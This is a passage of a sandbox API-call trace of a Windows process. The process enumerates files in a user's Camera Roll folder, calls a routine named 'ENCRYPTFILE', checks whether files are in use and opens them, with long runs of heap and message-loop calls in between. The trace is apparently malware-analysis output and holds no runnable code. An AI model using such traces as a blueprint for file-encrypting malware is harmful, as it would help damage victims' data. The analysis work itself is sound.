ftLastAccessTime.dwLowDateTime=0x51278b1d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x0, dwReserved1=0x43ca298, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0091.468] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0091.468] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0091.468] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0091.468] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0091.468] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0091.468] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0091.468] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0091.468] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0091.468] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e24c0, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0xa, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c356c, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="ﱈмńဓ+\x10")) returned 0 [0091.468] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0091.468] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0091.468] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0091.468] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0091.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|desktop.ini", cchCount1=12, lpString2="", cchCount2=0) returned 3 [0091.469] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0091.469] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0091.469] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0091.469] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0091.469] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0091.469] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0091.469] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0091.469] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\desktop.ini", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51278b1d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41abfc0 [0091.469] FindClose (in: hFindFile=0x41abfc0 | out: hFindFile=0x41abfc0) returned 1 [0091.469] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0091.469] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0091.469] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0091.470] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0091.470] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0091.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca730, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0091.471] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\camera roll\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0091.472] FreeLibrary (hLibModule=0x772d0000) returned 1 [0091.472] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0091.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0091.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0091.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0091.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0091.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0091.473] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0091.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0091.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0091.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0091.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0091.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0091.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0091.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0091.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0091.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0091.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0091.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0091.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0091.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0091.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0091.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0091.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0091.521] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0091.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0091.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0091.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0091.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0091.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0091.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0091.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0091.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0091.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0091.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0091.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0091.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0091.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0091.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0091.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0091.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0091.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0091.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0091.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0091.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0091.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0091.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0091.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0091.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0091.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0091.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0091.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0091.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0091.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0091.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0091.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0091.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0091.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0091.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0091.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0091.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0091.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0091.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0091.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0091.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0091.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0091.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0091.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0091.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0091.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0091.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0091.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0091.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0091.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0091.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0091.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0091.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0091.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0091.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0091.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0091.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0091.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0091.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0091.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0091.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0091.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0091.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0091.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0091.525] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0091.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0091.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0091.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0091.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0091.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0091.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0091.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0091.525] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0091.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0091.526] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0091.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0091.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0091.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0091.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0091.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0091.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0091.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0091.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0091.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0091.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0091.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0091.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0091.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0091.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0091.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0091.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0091.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0091.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0091.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0091.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0091.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0091.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0091.527] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0091.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0091.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0091.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0091.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0091.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0091.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0091.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0091.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0091.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0091.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0091.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0091.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0091.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0091.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0091.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0091.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0091.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0091.528] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0091.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0091.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0091.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca310 [0091.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca310, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0091.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0091.529] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0091.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0091.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0091.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0091.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0091.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0091.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0091.530] CloseHandle (hObject=0x298) returned 1 [0091.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0091.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0091.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0091.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0091.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0091.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0091.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0091.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0091.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0091.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0091.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0091.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0091.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0091.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0091.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0091.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0091.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0091.531] FreeLibrary (hLibModule=0x772d0000) returned 1 [0091.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0091.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0091.531] HeapFree (in: hHeap=0x1780000, 